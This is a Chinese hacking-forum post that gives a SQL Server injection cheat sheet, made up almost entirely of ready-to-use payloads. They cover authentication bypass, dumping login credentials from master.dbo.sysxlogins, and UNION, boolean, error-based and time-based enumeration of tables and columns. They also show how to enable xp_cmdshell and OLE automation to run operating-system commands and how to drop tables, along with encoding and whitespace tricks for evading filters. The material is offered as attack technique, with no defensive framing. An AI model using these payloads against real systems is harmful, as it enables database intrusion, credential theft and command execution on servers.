搜索
查看: 689|回复: 0

数据库的一些注入技巧-sqlserver

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2019-11-6 20:06:57 | 显示全部楼层 |阅读模式
默认数据库
pubs
MSsql 2005版本以上不支持
model
支持所有版本
msdb
支持所有版本
tempdb
支持所有版本
northwind
支持所有版本
information_schema
支持MSSQL 2000及以上版本


注释
/*
--
;%00

SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password ='';
SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3/*';

查询版本信息
@@VERSION

SELECT * FROM Users WHERE id = '1' AND @@VERSION LIKE'%2008%';


查询数据库凭证
Database..Table
master..syslogins, master..sysprocesses
Columns
name, loginame
Current  User
user, system_user, suser_sname(), is_srvrolemember('sysadmin')
Database  Credentials
SELECT user, password FROM master.dbo.sysxlogins

SELECT loginame FROM master..sysprocesses WHERE spid=@@SPID;
SELECT (CASE WHEN (IS_SRVROLEMEMBER('sysadmin')=1) THEN '1' ELSE'0' END);

查询数据库信息
Database.Table
master..sysdatabases
Column
name
Current  DB
DB_NAME(i)

·      SELECT DB_NAME(5);
·      SELECT name FROM master..sysdatabases;

查询主机名称
@@SERVERNAME
SERVERPROPERTY()

SELECT SERVERPROPERTY('productversion'), SERVERPROPERTY('productlevel'), SERVERPROPERTY('edition');

查询表和列
确定列数
ORDER BY n+1;

漏洞语句:
SELECT username, password, permission FROM UsersWHERE id = '1';

查询列数如下:
1' ORDER BY 1--
True
1'  ORDER BY 2--
True
1'  ORDER BY 3--
True
1'  ORDER BY 4--
False - Query is  only using 3 columns
-1'  UNION SELECT 1,2,3--
True

查询列
GROUP BY / HAVING

漏洞语句:
SELECT username,password, permission FROM Users WHERE id = '1';
注入语句:
1' HAVING 1=1--
Column  'Users.username' is invalid in the select list because it is not contained in  either an aggregate function or the GROUP BY clause.
1'  GROUP BY username HAVING 1=1--
Column  'Users.password' is invalid in the select list because it is not contained in  either an aggregate function or the GROUP BY clause.
1'  GROUP BY username, password HAVING 1=1--
Column  'Users.permission' is invalid in the select list because it is not contained  in either an aggregate function or the GROUP BY clause.
1'  GROUP BY username, password, permission HAVING 1=1--
No Error

查询表
从以下两个数据库中查询表信息:
information_schema.tables、master..sysobjects

联合查询
UNION SELECT name FROM  master..sysobjects WHERE xtype='U'

布尔查询
AND SELECT  SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'


报错查询
AND 1 = (SELECT TOP  1 table_name FROM information_schema.tables)
AND 1 = (SELECT TOP  1 table_name FROM information_schema.tables WHERE table_name NOT IN(SELECT  TOP 1 table_name FROM information_schema.tables))

查询列
从以下两个数据库中查询表信息:
information_schema.columns 、 masters..syscolumns

联合查询
UNION SELECT nameFROM master..syscolumns WHERE id = (SELECT id FROM master..syscolumns WHEREname = 'tablename')

布尔查询
AND SELECT SUBSTRING(column_name,1,1) FROMinformation_schema.columns > 'A'

报错查询
AND 1 = (SELECT TOP  1 column_name FROM information_schema.columns)
AND 1 = (SELECT TOP  1 column_name FROM information_schema.columns WHERE column_name NOT IN(SELECT  TOP 1 column_name FROM information_schema.columns))

检索多个表/列
1、
AND 1=0; BEGIN DECLARE @xy varchar(8000) SET@xy=':' SELECT @xy=@xy+' '+name FROMsysobjects WHERE xtype='U' AND name>@xy SELECT @xy AS xy INTO TMP_DB END;
2、
AND 1=(SELECT TOP 1 SUBSTRING(xy,1,353) FROMTMP_DB);

3、
AND 1=0; DROP TABLE TMP_DB;

SQL Server 2005版本以上适用
SELECT table_name %2b ', ' FROM information_schema.tables FOR  XML PATH('')


储存过程查询:
' AND 1=0; DECLARE @S VARCHAR(4000) SET@S=CAST(0x44524f50205441424c4520544d505f44423b AS VARCHAR(4000)); EXEC (@S);--

避免单引号
SELECT * FROM Users WHERE username = CHAR(97) +  CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110)

字符串拼接
SELECT CONCAT('a','a','a'); (SQL SERVER 2012)
SELECT 'a'+'d'+'mi'+'n';

条件判断
IF
CASE
IF 1=1 SELECT'true' ELSE SELECT 'false';
SELECT CASE WHEN 1=1 THEN true ELSE false END;

时间注入
WAITFOR DELAY 'time_to_pass';
WAITFOR TIME 'time_to_execute';

IF 1=1 WAITFOR DELAY '0:0:5' ELSE WAITFORDELAY '0:0:0';

执行命令
EXEC master.dbo.xp_cmdshell 'cmd';

mssql 2005默认禁用xp_cmdshell,用以下语句开启:
EXEC sp_configure 'show advanced  options', 1
EXEC  sp_configure reconfigure
EXEC  sp_configure 'xp_cmdshell', 1
EXEC  sp_configure reconfigure

调用wscript执行命令:
DECLARE @execmd INT
EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT
EXEC SP_OAMETHOD @execmd, 'run', null,  '%systemroot%\system32\cmd.exe /c echo jumbo'
如果版本高于sql 2000,需要执行其他查询才能执行上一条命令:

EXEC sp_configure 'show advanced options', 1
EXEC sp_configure reconfigure
EXEC sp_configure 'OLE Automation Procedures', 1
EXEC sp_configure reconfigure
例:
1、把命令结果存入tmp_db
' IF EXISTS (SELECT 1 FROMINFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE@a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id(N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGINCREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_valueint, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGINCREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXECmaster..xp_cmdshell 'dir' SELECT @a='' SELECT@a=Replace(@a%2B'<br></font><fontcolor="black">'%2Bdir,'<dir>','</font><fontcolor="orange">') FROM %23Data WHERE dir>@a DROP TABLE %23DataEND ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSESELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB--
2、从tmp_db查询内容:
' UNION SELECT tbl FROM TMP_DB--

3、删除tmp_db
' DROP TABLE TMP_DB--

多语句查询
' AND 1=0 INSERT INTO ([column1], [column2]) VALUES('value1', 'value2');

混淆以下字符等同于空
01
02
03
04
05
06
07
08
09
0A
0B
0C
0D
0E
0F
10
11
12
13
14
15
16
17
18
19
1A
1B
1C
1D
1E
1F
20
25


S%E%L%E%C%T%01column%02FROM%03table;
A%%ND 1=%%%%%%%%1;
%仅限于ASP(x)环境

以下字符代替空格
22
"
28
(
29
)
5B
[
5D


UNION(SELECT(column)FROM(table));
SELECT"table_name"FROM[information_schema].[tables];

and/or之后可以使用的符号
01 - 20
Range
21
!
2B
+
2D
-
2E
.
5C
\
7E
~


SELECT 1FROMWHERE\1=\1AND\1=\1;

编码[table=98%]
URL Encoding
SELECT  %74able_%6eame FROM information_schema.tables;

Double URL  Encoding
SELECT  %2574able_%256eame FROM information_schema.tables;

Unicode Encoding
SELECT  %u0074able_%u6eame FROM information_schema.tables;

Invalid Hex  Encoding (ASP)
SELECT  %tab%le_%na%me FROM information_schema.tables;

Hex Encoding
'  AND 1=0; DECLARE @S VARCHAR(4000) SET @S=CAST(0x53454c4543542031 AS  VARCHAR(4000)); EXEC (@S);--

HTML Entities  (Needs to be verified)
%26%2365%3B%26%2378%3B%26%2368%3B%26%2332%3B%26%2349%3B%26%2361%3B%26%2349%3B


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表